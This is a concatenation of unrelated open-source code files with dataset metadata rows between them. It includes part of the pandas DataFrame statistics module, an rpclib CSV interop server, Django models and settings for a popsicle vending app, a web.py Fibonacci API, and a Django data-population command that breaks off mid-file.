return self._constructor(correl, index=idx, columns=cols)
def cov(self, min_periods=None):
"""
Compute pairwise covariance of columns, excluding NA/null values
Parameters
----------
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result.
Returns
-------
y : DataFrame
Notes
-----
`y` contains the covariance matrix of the DataFrame's time series.
The covariance is normalized by N-1 (unbiased estimator).
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.values
if notna(mat).all():
if min_periods is not None and min_periods > len(mat):
baseCov = np.empty((mat.shape[1], mat.shape[1]))
baseCov.fill(np.nan)
else:
baseCov = np.cov(mat.T)
baseCov = baseCov.reshape((len(cols), len(cols)))
else:
baseCov = libalgos.nancorr(_ensure_float64(mat), cov=True,
minp=min_periods)
return self._constructor(baseCov, index=idx, columns=cols)
def corrwith(self, other, axis=0, drop=False):
"""
Compute pairwise correlation between rows or columns of two DataFrame
objects.
Parameters
----------
other : DataFrame, Series
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' to compute column-wise, 1 or 'columns' for row-wise
drop : boolean, default False
Drop missing indices from result, default returns union of all
Returns
-------
correls : Series
"""
axis = self._get_axis_number(axis)
this = self._get_numeric_data()
if isinstance(other, Series):
return this.apply(other.corr, axis=axis)
other = other._get_numeric_data()
left, right = this.align(other, join='inner', copy=False)
# mask missing values
left = left + right * 0
right = right + left * 0
if axis == 1:
left = left.T
right = right.T
# demeaned data
ldem = left - left.mean()
rdem = right - right.mean()
num = (ldem * rdem).sum()
dom = (left.count() - 1) * left.std() * right.std()
correl = num / dom
if not drop:
raxis = 1 if axis == 0 else 0
result_index = this._get_axis(raxis).union(other._get_axis(raxis))
correl = correl.reindex(result_index)
return correl
# ----------------------------------------------------------------------
# ndarray-like stats methods
def count(self, axis=0, level=None, numeric_only=False):
"""
Return Series with number of non-NA/null observations over requested
axis. Works with non-floating point data as well (detects NaN and None)
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a DataFrame
numeric_only : boolean, default False
Include only float, int, boolean data
Returns
-------
count : Series (or DataFrame if level specified)
"""
axis = self._get_axis_number(axis)
if level is not None:
return self._count_level(level, axis=axis,
numeric_only=numeric_only)
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
# GH #423
if len(frame._get_axis(axis)) == 0:
result = Series(0, index=frame._get_agg_axis(axis))
else:
if frame._is_mixed_type:
result = notna(frame).sum(axis=axis)
else:
counts = notna(frame.values).sum(axis=axis)
result = Series(counts, index=frame._get_agg_axis(axis))
return result.astype('int64')
def _count_level(self, level, axis=0, numeric_only=False):
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
count_axis = frame._get_axis(axis)
agg_axis = frame._get_agg_axis(axis)
if not isinstance(count_axis, MultiIndex):
raise TypeError("Can only count levels on hierarchical %s." %
self._get_axis_name(axis))
if frame._is_mixed_type:
# Since we have mixed types, calling notna(frame.values) might
# upcast everything to object
mask = notna(frame).values
else:
# But use the speedup when we have homogeneous dtypes
mask = notna(frame.values)
if axis == 1:
# We're transposing the mask rather than frame to avoid potential
# upcasts to object, which induces a ~20x slowdown
mask = mask.T
if isinstance(level, compat.string_types):
level = count_axis._get_level_number(level)
level_index = count_axis.levels[level]
labels = _ensure_int64(count_axis.labels[level])
counts = lib.count_level_2d(mask, labels, len(level_index), axis=0)
result = DataFrame(counts, index=level_index, columns=agg_axis)
if axis == 1:
# Undo our earlier transpose
return result.T
else:
return result
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
axis = self._get_axis_number(axis)
def f(x):
return op(x, axis=axis, skipna=skipna, **kwds)
labels = self._get_agg_axis(axis)
# exclude timedelta/datetime unless we are uniform types
if axis == 1 and self._is_mixed_type and self._is_datelike_mixed_type:
numeric_only = True
if numeric_only is None:
try:
values = self.values
result = f(values)
except Exception as e:
# try by-column first
if filter_type is None and axis == 0:
try:
# this can end up with a non-reduction
# but not always. if the types are mixed
# with datelike then need to make sure a series
# we only end up here if we have not specified
# numeric_only and yet we have tried a
# column-by-column reduction, where we have mixed type.
# So let's just do what we can
result = self.apply(f, reduce=False,
ignore_failures=True)
if result.ndim == self.ndim:
result = result.iloc[0]
return result
except:
pass
if filter_type is None or filter_type == 'numeric':
data = self._get_numeric_data()
elif filter_type == 'bool':
data = self._get_bool_data()
else: # pragma: no cover
e = NotImplementedError("Handling exception with filter_"
"type %s not implemented." %
filter_type)
raise_with_traceback(e)
with np.errstate(all='ignore'):
result = f(data.values)
labels = data._get_agg_axis(axis)
else:
if numeric_only:
if filter_type is None or filter_type == 'numeric':
data = self._get_numeric_data()
elif filter_type == 'bool':
data = self._get_bool_data()
else: # pragma: no cover
msg = ("Generating numeric_only data with filter_type %s"
"not supported." % filter_type)
raise NotImplementedError(msg)
values = data.values
labels = data._get_agg_axis(axis)
else:
values = self.values
result = f(values)
if hasattr(result, 'dtype') and is_object_dtype(result.dtype):
try:
if filter_type is None or filter_type == 'numeric':
result = result.astype(np.float64)
elif filter_type == 'bool' and notna(result).all():
result = result.astype(np.bool_)
except (ValueError, TypeError):
# try to coerce to the original dtypes item by item if we can
if axis == 0:
result = coerce_to_dtypes(result, self.dtypes)
return Series(result, index=labels)
def nunique(self, axis=0, dropna=True):
"""
Return Series with number of distinct observations over requested
axis.
.. versionadded:: 0.20.0
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
dropna : boolean, default True
Don't include NaN in the counts.
Returns
-------
nunique : Series
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 1, 1]})
>>> df.nunique()
A 3
B 1
>>> df.nunique(axis=1)
0 1
1 2
2 2
"""
return self.apply(Series.nunique, axis=axis, dropna=dropna)
def idxmin(self, axis=0, skipna=True):
"""
Return index of first occurrence of minimum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Raises
------
ValueError
* If the row/column is empty
Returns
-------
idxmin : Series
Notes
-----
This method is the DataFrame version of ``ndarray.argmin``.
See Also
--------
Series.idxmin
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmin(self.values, axis=axis, skipna=skipna)
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return Series(result, index=self._get_agg_axis(axis))
def idxmax(self, axis=0, skipna=True):
"""
Return index of first occurrence of maximum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Raises
------
ValueError
* If the row/column is empty
Returns
-------
idxmax : Series
Notes
-----
This method is the DataFrame version of ``ndarray.argmax``.
See Also
--------
Series.idxmax
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmax(self.values, axis=axis, skipna=skipna)
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return Series(result, index=self._get_agg_axis(axis))
def _get_agg_axis(self, axis_num):
""" let's be explicit about this """
if axis_num == 0:
return self.columns
elif axis_num == 1:
return self.index
else:
raise ValueError('Axis must be 0 or 1 (got %r)' % axis_num)
def mode(self, axis=0, numeric_only=False):
"""
Gets the mode(s) of each element along the axis selected. Adds a row
for each mode per label, fills in gaps with nan.
Note that there could be multiple values returned for the selected
axis (when more than one item share the maximum frequency), which is
the reason why a dataframe is returned. If you want to impute missing
values with the mode in a dataframe ``df``, you can just do this:
``df.fillna(df.mode().iloc[0])``
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
* 0 or 'index' : get mode of each column
* 1 or 'columns' : get mode of each row
numeric_only : boolean, default False
if True, only apply to numeric columns
Returns
-------
modes : DataFrame (sorted)
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 1, 2, 1, 2, 3]})
>>> df.mode()
A
0 1
1 2
"""
data = self if not numeric_only else self._get_numeric_data()
def f(s):
return s.mode()
return data.apply(f, axis=axis)
def quantile(self, q=0.5, axis=0, numeric_only=True,
interpolation='linear'):
"""
Return values at the given quantile over requested axis, a la
numpy.percentile.
Parameters
----------
q : float or array-like, default 0.5 (50% quantile)
0 <= q <= 1, the quantile(s) to compute
axis : {0, 1, 'index', 'columns'} (default 0)
0 or 'index' for row-wise, 1 or 'columns' for column-wise
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
.. versionadded:: 0.18.0
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
* linear: `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* lower: `i`.
* higher: `j`.
* nearest: `i` or `j` whichever is nearest.
* midpoint: (`i` + `j`) / 2.
Returns
-------
quantiles : Series or DataFrame
- If ``q`` is an array, a DataFrame will be returned where the
index is ``q``, the columns are the columns of self, and the
values are the quantiles.
- If ``q`` is a float, a Series will be returned where the
index is the columns of self and the values are the quantiles.
Examples
--------
>>> df = pd.DataFrame(np.array([[1, 1], [2, 10], [3, 100], [4, 100]]),
columns=['a', 'b'])
>>> df.quantile(.1)
a 1.3
b 3.7
dtype: float64
>>> df.quantile([.1, .5])
a b
0.1 1.3 3.7
0.5 2.5 55.0
"""
self._check_percentile(q)
data = self._get_numeric_data() if numeric_only else self
axis = self._get_axis_number(axis)
is_transposed = axis == 1
if is_transposed:
data = data.T
result = data._data.quantile(qs=q,
axis=1,
interpolation=interpolation,
transposed=is_transposed)
if result.ndim == 2:
result = self._constructor(result)
else:
result = self._constructor_sliced(result, name=q)
if is_transposed:
result = result.T
return result
def to_timestamp(self, freq=None, how='start', axis=0, copy=True):
"""
Cast to DatetimeIndex of timestamps, at *beginning* of period
Parameters
----------
freq : string, default frequency of PeriodIndex
Desired frequency
how : {'s', 'e', 'start', 'end'}
Convention for converting period to timestamp; start of period
vs. end
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default)
copy : boolean, default True
If false then underlying input data is not copied
Returns
-------
df : DataFrame with DatetimeIndex
"""
new_data = self._data
if copy:
new_data = new_data.copy()
axis = self._get_axis_number(axis)
if axis == 0:
new_data.set_axis(1, self.index.to_timestamp(freq=freq, how=how))
elif axis == 1:
new_data.set_axis(0, self.columns.to_timestamp(freq=freq, how=how))
else: # pragma: no cover
raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
return self._constructor(new_data)
def to_period(self, freq=None, axis=0, copy=True):
"""
Convert DataFrame from DatetimeIndex to PeriodIndex with desired
frequency (inferred from index if not passed)
Parameters
----------
freq : string, default
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default)
copy : boolean, default True
If False then underlying input data is not copied
Returns
-------
ts : TimeSeries with PeriodIndex
"""
new_data = self._data
if copy:
new_data = new_data.copy()
axis = self._get_axis_number(axis)
if axis == 0:
new_data.set_axis(1, self.index.to_period(freq=freq))
elif axis == 1:
new_data.set_axis(0, self.columns.to_period(freq=freq))
else: # pragma: no cover
raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
return self._constructor(new_data)
def isin(self, values):
"""
Return boolean DataFrame showing whether each element in the
DataFrame is contained in values.
Parameters
----------
values : iterable, Series, DataFrame or dictionary
The result will only be true at a location if all the
labels match. If `values` is a Series, that's the index. If
`values` is a dictionary, the keys must be the column names,
which must match. If `values` is a DataFrame,
then both the index and column labels must match.
Returns
-------
DataFrame of booleans
Examples
--------
When ``values`` is a list:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
>>> df.isin([1, 3, 12, 'a'])
A B
0 True True
1 False False
2 True False
When ``values`` is a dict:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 4, 7]})
>>> df.isin({'A': [1, 3], 'B': [4, 7, 12]})
A B
0 True False # Note that B didn't match the 1 here.
1 False True
2 True True
When ``values`` is a Series or DataFrame:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
>>> other = DataFrame({'A': [1, 3, 3, 2], 'B': ['e', 'f', 'f', 'e']})
>>> df.isin(other)
A B
0 True False
1 False False # Column A in `other` has a 3, but not at index 1.
2 True True
"""
if isinstance(values, dict):
from pandas.core.reshape.concat import concat
values = collections.defaultdict(list, values)
return concat((self.iloc[:, [i]].isin(values[col])
for i, col in enumerate(self.columns)), axis=1)
elif isinstance(values, Series):
if not values.index.is_unique:
raise ValueError("cannot compute isin with "
"a duplicate axis.")
return self.eq(values.reindex_like(self), axis='index')
elif isinstance(values, DataFrame):
if not (values.columns.is_unique and values.index.is_unique):
raise ValueError("cannot compute isin with "
"a duplicate axis.")
return self.eq(values.reindex_like(self))
else:
if not is_list_like(values):
raise TypeError("only list-like or dict-like objects are "
"allowed to be passed to DataFrame.isin(), "
"you passed a "
"{0!r}".format(type(values).__name__))
return DataFrame(
algorithms.isin(self.values.ravel(),
values).reshape(self.shape), self.index,
self.columns)
# ----------------------------------------------------------------------
# Add plotting methods to DataFrame
plot = accessor.AccessorProperty(gfx.FramePlotMethods,
gfx.FramePlotMethods)
hist = gfx.hist_frame
boxplot = gfx.boxplot_frame
DataFrame._setup_axes(['index', 'columns'], info_axis=1, stat_axis=0,
axes_are_reversed=True, aliases={'rows': 0})
DataFrame._add_numeric_operations()
DataFrame._add_series_or_dataframe_operations()
ops.add_flex_arithmetic_methods(DataFrame, **ops.frame_flex_funcs)
ops.add_special_arithmetic_methods(DataFrame, **ops.frame_special_funcs)
def _arrays_to_mgr(arrays, arr_names, index, columns, dtype=None):
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
# figure out the index, if necessary
if index is None:
index = extract_index(arrays)
else:
index = _ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
# from BlockManager perspective
axes = [_ensure_index(columns), _ensure_index(index)]
return create_block_manager_from_arrays(arrays, arr_names, axes)
def extract_index(data):
from pandas.core.index import _union_indexes
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
indexes = []
have_raw_arrays = False
have_series = False
have_dicts = False
for v in data:
if isinstance(v, Series):
have_series = True
indexes.append(v.index)
elif isinstance(v, dict):
have_dicts = True
indexes.append(list(v.keys()))
elif is_list_like(v) and getattr(v, 'ndim', 1) == 1:
have_raw_arrays = True
raw_lengths.append(len(v))
if not indexes and not raw_lengths:
raise ValueError('If using all scalar values, you must pass'
' an index')
if have_series or have_dicts:
index = _union_indexes(indexes)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError('arrays must all be same length')
if have_dicts:
raise ValueError('Mixing dicts with non-Series may lead to '
'ambiguous ordering.')
if have_series:
if lengths[0] != len(index):
msg = ('array length %d does not match index length %d' %
(lengths[0], len(index)))
raise ValueError(msg)
else:
index = _default_index(lengths[0])
return _ensure_index(index)
def _prep_ndarray(values, copy=True):
if not isinstance(values, (np.ndarray, Series, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
def convert(v):
return maybe_convert_platform(v)
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
try:
if is_list_like(values[0]) or hasattr(values[0], 'len'):
values = np.array([convert(v) for v in values])
else:
values = convert(values)
except:
values = convert(values)
else:
# drop subclass info, do not copy data
values = np.asarray(values)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError('Must pass 2-d input')
return values
def _to_arrays(data, columns, coerce_float=False, dtype=None):
"""
Return list of arrays, columns
"""
if isinstance(data, DataFrame):
if columns is not None:
arrays = [data._ixs(i, axis=1).values
for i, col in enumerate(data.columns) if col in columns]
else:
columns = data.columns
arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
return arrays, columns
if not len(data):
if isinstance(data, np.ndarray):
columns = data.dtype.names
if columns is not None:
return [[]] * len(columns), columns
return [], [] # columns if columns is not None else []
if isinstance(data[0], (list, tuple)):
return _list_to_arrays(data, columns, coerce_float=coerce_float,
dtype=dtype)
elif isinstance(data[0], collections.Mapping):
return _list_of_dict_to_arrays(data, columns,
coerce_float=coerce_float, dtype=dtype)
elif isinstance(data[0], Series):
return _list_of_series_to_arrays(data, columns,
coerce_float=coerce_float,
dtype=dtype)
elif isinstance(data[0], Categorical):
if columns is None:
columns = _default_index(len(data))
return data, columns
elif (isinstance(data, (np.ndarray, Series, Index)) and
data.dtype.names is not None):
columns = list(data.dtype.names)
arrays = [data[k] for k in columns]
return arrays, columns
else:
# last ditch effort
data = lmap(tuple, data)
return _list_to_arrays(data, columns, coerce_float=coerce_float,
dtype=dtype)
def _masked_rec_array_to_mgr(data, index, columns, dtype, copy):
""" extract from a masked rec array and create the manager """
# essentially process a record array then fill it
fill_value = data.fill_value
fdata = ma.getdata(data)
if index is None:
index = _get_names_from_index(fdata)
if index is None:
index = _default_index(len(data))
index = _ensure_index(index)
if columns is not None:
columns = _ensure_index(columns)
arrays, arr_columns = _to_arrays(fdata, columns)
# fill if needed
new_arrays = []
for fv, arr, col in zip(fill_value, arrays, arr_columns):
mask = ma.getmaskarray(data[col])
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
# create the manager
arrays, arr_columns = _reorder_arrays(new_arrays, arr_columns, columns)
if columns is None:
columns = arr_columns
mgr = _arrays_to_mgr(arrays, arr_columns, index, columns)
if copy:
mgr = mgr.copy()
return mgr
def _reorder_arrays(arrays, arr_columns, columns):
# reorder according to the columns
if (columns is not None and len(columns) and arr_columns is not None and
len(arr_columns)):
indexer = _ensure_index(arr_columns).get_indexer(columns)
arr_columns = _ensure_index([arr_columns[i] for i in indexer])
arrays = [arrays[i] for i in indexer]
return arrays, arr_columns
def _list_to_arrays(data, columns, coerce_float=False, dtype=None):
if len(data) > 0 and isinstance(data[0], tuple):
content = list(lib.to_object_array_tuples(data).T)
else:
# list of lists
content = list(lib.to_object_array(data).T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
def _list_of_series_to_arrays(data, columns, coerce_float=False, dtype=None):
from pandas.core.index import _get_objs_combined_axis
if columns is None:
columns = _get_objs_combined_axis(data)
indexer_cache = {}
aligned_values = []
for s in data:
index = getattr(s, 'index', None)
if index is None:
index = _default_index(len(s))
if id(index) in indexer_cache:
indexer = indexer_cache[id(index)]
else:
indexer = indexer_cache[id(index)] = index.get_indexer(columns)
values = _values_from_object(s)
aligned_values.append(algorithms.take_1d(values, indexer))
values = np.vstack(aligned_values)
if values.dtype == np.object_:
content = list(values.T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
else:
return values.T, columns
def _list_of_dict_to_arrays(data, columns, coerce_float=False, dtype=None):
if columns is None:
gen = (list(x.keys()) for x in data)
sort = not any(isinstance(d, OrderedDict) for d in data)
columns = lib.fast_unique_multiple_list_gen(gen, sort=sort)
# assure that they are of the base dict class and not of derived
# classes
data = [(type(d) is dict) and d or dict(d) for d in data]
content = list(lib.dicts_to_array(data, list(columns)).T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
def _convert_object_array(content, columns, coerce_float=False, dtype=None):
if columns is None:
columns = _default_index(len(content))
else:
if len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError('%d columns passed, passed data had %s '
'columns' % (len(columns), len(content)))
# provide soft conversion of object dtypes
def convert(arr):
if dtype != object and dtype != np.object:
arr = lib.maybe_convert_objects(arr, try_float=coerce_float)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays, columns
def _get_names_from_index(data):
has_some_name = any(getattr(s, 'name', None) is not None for s in data)
if not has_some_name:
return _default_index(len(data))
index = lrange(len(data))
count = 0
for i, s in enumerate(data):
n = getattr(s, 'name', None)
if n is not None:
index[i] = n
else:
index[i] = 'Unnamed %d' % count
count += 1
return index
def _homogenize(data, index, dtype=None):
from pandas.core.series import _sanitize_array
oindex = None
homogenized = []
for v in data:
if isinstance(v, Series):
if dtype is not None:
v = v.astype(dtype)
if v.index is not index:
# Forces alignment. No need to copy data since we
# are putting it into an ndarray later
v = v.reindex(index, copy=False)
else:
if isinstance(v, dict):
if oindex is None:
oindex = index.astype('O')
if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
v = _dict_compat(v)
else:
v = dict(v)
v = lib.fast_multiget(v, oindex.values, default=np.nan)
v = _sanitize_array(v, index, dtype=dtype, copy=False,
raise_cast_failure=False)
homogenized.append(v)
return homogenized
def _from_nested_dict(data):
# TODO: this should be seriously cythonized
new_data = OrderedDict()
for index, s in compat.iteritems(data):
for col, v in compat.iteritems(s):
new_data[col] = new_data.get(col, OrderedDict())
new_data[col][index] = v
return new_data
def _put_str(s, space):
return ('%s' % s)[:space].ljust(space)
| bsd-3-clause | 7,829,162,651,239,753,000 | 35.73283 | 85 | 0.523551 | false |
martijnvermaat/rpclib | src/rpclib/test/interop/server/httprpc_csv_basic.py | 1 | 1859 | #!/usr/bin/env python
#
# rpclib - Copyright (C) Rpclib contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
import logging
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger('rpclib.protocol.xml')
logger.setLevel(logging.DEBUG)
from rpclib.application import Application
from rpclib.interface.wsdl import Wsdl11
from rpclib.protocol.csv import OutCsv
from rpclib.protocol.http import HttpRpc
from rpclib.server.wsgi import WsgiApplication
from rpclib.test.interop.server._service import services
httprpc_csv_application = Application(services,
'rpclib.test.interop.server.httprpc.csv', HttpRpc(), OutCsv(), Wsdl11())
if __name__ == '__main__':
try:
from wsgiref.simple_server import make_server
from wsgiref.validate import validator
wsgi_application = WsgiApplication(httprpc_csv_application)
server = make_server('0.0.0.0', 9755, validator(wsgi_application))
logger.info('Starting interop server at %s:%s.' % ('0.0.0.0', 9755))
logger.info('WSDL is at: /?wsdl')
server.serve_forever()
except ImportError:
print("Error: example server code requires Python >= 2.5")
| lgpl-2.1 | -6,483,269,929,289,989,000 | 37.729167 | 80 | 0.737493 | false |
pi2-picole/api | vendor/models.py | 1 | 3896 | from django.db import models
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.core.validators import MinValueValidator
@receiver(post_save, sender=User)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
# Create your models here.
class Popsicle(models.Model):
flavor = models.CharField(max_length=25, default="", unique=True)
price = models.CharField(max_length=4, default='100')
is_active = models.BooleanField(default=True)
def __str__(self):
return "{}".format(self.flavor)
class Machine(models.Model):
is_active = models.BooleanField(default=True)
label = models.CharField(max_length=25, default="")
seller = models.ForeignKey(User, related_name='machines', null=True)
def __str__(self):
return "{}'s machine: #{} {}".format(self.label, self.id, self.locations.last())
class Location(models.Model):
lat = models.CharField(max_length=15, default="")
lng = models.CharField(max_length=15, default="")
machine = models.ForeignKey(
Machine,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True},
related_name="locations"
)
updated_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "(lat:{},lng:{}) at {}".format(self.lat, self.lng, self.updated_at)
class Stock(models.Model):
popsicle = models.ForeignKey(
Popsicle,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True}
)
amount = models.PositiveSmallIntegerField(default=0)
machine = models.ForeignKey(
Machine,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True},
related_name="stocks"
)
updated_at = models.DateField(auto_now=True)
class Transaction(models.Model):
class Meta:
abstract = True
popsicle = models.ForeignKey(
Popsicle,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True}
)
amount = models.PositiveSmallIntegerField(
default=0, validators=[MinValueValidator(1)]
)
machine = models.ForeignKey(
Machine,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True}
)
timestamp = models.DateTimeField(auto_now_add=True)
class Purchase(Transaction):
lid_was_released = models.BooleanField(default=False)
class PopsicleEntry(Transaction):
pass
class PopsicleRemoval(Transaction):
pass
@receiver(post_save, sender=Purchase)
@receiver(post_save, sender=PopsicleRemoval)
def remove_from_stock(sender, instance, created, **kwargs):
if created:
stock = Stock.objects.get(
popsicle=instance.popsicle, machine=instance.machine
)
stock.amount -= instance.amount
stock.save()
@receiver(post_save, sender=PopsicleEntry)
def add_to_stock(sender, instance, created, **kwargs):
if created:
stock = Stock.objects.get(
popsicle=instance.popsicle, machine=instance.machine
)
stock.amount += instance.amount
stock.save()
@receiver(post_save, sender=Machine)
def create_stocks_for_machine(sender, instance, created, **kwargs):
if created:
stocks = []
for pop in Popsicle.objects.all():
stocks.append(Stock(machine=instance, popsicle=pop, amount=0))
Stock.objects.bulk_create(stocks)
@receiver(post_save, sender=Popsicle)
def create_stocks_for_popsicle(sender, instance, created, **kwargs):
if created:
stocks = []
for machine in Machine.objects.all():
stocks.append(Stock(machine=machine, popsicle=instance, amount=0))
Stock.objects.bulk_create(stocks)
| mit | -7,058,885,298,412,033,000 | 29.677165 | 88 | 0.667608 | false |
priestc/MultiExplorer | local_settings_default.py | 1 | 1056 | # Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
'TIMEOUT': 500000,
}
}
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
WALLET_SUPPORTED_CRYPTOS = []
WALLET_SUPPORTED_FIATS = ['usd', 'eur', 'cny', 'jpy', 'idr', 'cad', 'gbp']
EXCHANGE_KICK_INTERVAL_MINUTES = 10
EXCHANGE_FEE_PERCENTAGE = 1.5
MAX_MEMO_SIZE_BYTES = 1000
MEMO_SERVER_PRIVATE_MODE = False
MEMO_SERVER_PULL = [
'https://multiexplorer.com/memo/pull'
]
MEMO_SERVER_PUSH = [
'https://multiexplorer.com/memo'
]
DEBUG = False
LOGIN_TRIES = 5
ALLOWED_HOSTS = []
PRICE_INTERVAL_SECONDS = 500
QUANDL_APIKEY = None
IP_FILTER_INTERVAL = {'minutes': 5}
IP_FILTER_HITS = 25
| mit | 1,227,060,583,103,808,500 | 21.956522 | 74 | 0.648674 | false |
erben22/fib | fibserver.py | 1 | 1239 | """Implementation of a web server API that serves up Fibonacci numbers.
TODO: Add some additional error handling:
- Need some handling around the query parameter on the
API. What if it is not supplied for example?
"""
import web
from fibonacci import Fibonacci
urls = (
'/fibonacci', 'FibonacciHandler'
)
"""Definition of the API endpoint to HTTP handler class."""
class FibonacciHandler:
"""Fibonacci endpoint handler. Will expect a parameter to be present
for the sequence to calcualte, and if present, will create an
instance of our Fibonacci class to calculate the value and return
it to the caller.
"""
def GET(self):
"""Implementation of the GET handler interface."""
try:
desired_sequence = int(web.input().desired_sequence)
fibonacci = Fibonacci(desired_sequence)
return fibonacci.calculate()
except:
raise web.HTTPError('400 Bad Request', {})
if __name__ == "__main__":
"""Main method that fires up the web application and listens for
prospective requests from various clients.
"""
web.config.debug = False
app = web.application(urls, globals())
app.run()
| mit | -1,917,998,892,817,449,200 | 28.5 | 73 | 0.652139 | false |
esteluk/reinhardt | memberinfo/management/commands/populate.py | 2 | 3209 | import settings
from django.core.management.base import NoArgsCommand
from django.contrib.auth.models import User
from compsoc.memberinfo.models import *
from compsoc.events.models import *
from datetime import date
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list
help = "Populates some simple data into the database"
requires_model_validation = True
def handle_noargs(self, **options):
'''
Inserts the following data into the database:
Terms
Sample Event Types
Sample Locations
Sample Events
Assumes:
syncdb has been run, and there is a user
'''
#u = User.objects.all()[0]
#try:
#mem = Member(user=u,showDetails=True,guest=False)
#mem.save()
#except: pass #user already has member object
# sort of broken :p
#lists = ['announce','discuss','exec','gaming','jobs','socials','techteam']
#for suffix in lists:
#u.mailinglist_set.create(list='compsoc-'+suffix+'@uwcs.co.uk')
terms = [
# from http://www2.warwick.ac.uk/study/termdates/
# 2007/2008
('AU',1,date(2007,10,01)),
('SP',11,date(2008,1,07)),
('SU',21,date(2008,4,21)),
# 2008/2009
('AU',1,date(2008,9,29)),
('SP',11,date(2009,1,5)),
('SU',21,date(2009,4,20)),
# 2009/2010
('AU',1,date(2009,10,5)),
('SP',11,date(2010,1,11)),
('SU',21,date(2010,4,26)),
# 2010/2011
('AU',1,date(2010,10,4)),
('SP',11,date(2011,1,10)),
('SU',21,date(2011,4,27)),
# 2011/2012
('AU',1,date(2011,10,3)),
('SP',11,date(2012,1,9)),
('SU',21,date(2012,4,23)),
# 2012/2013
('AU',1,date(2012,10,1)),
('SP',11,date(2013,1,7)),
('SU',21,date(2013,4,22)),
# 2013/2014
('AU',1,date(2013,9,30)),
('SP',11,date(2014,1,6)),
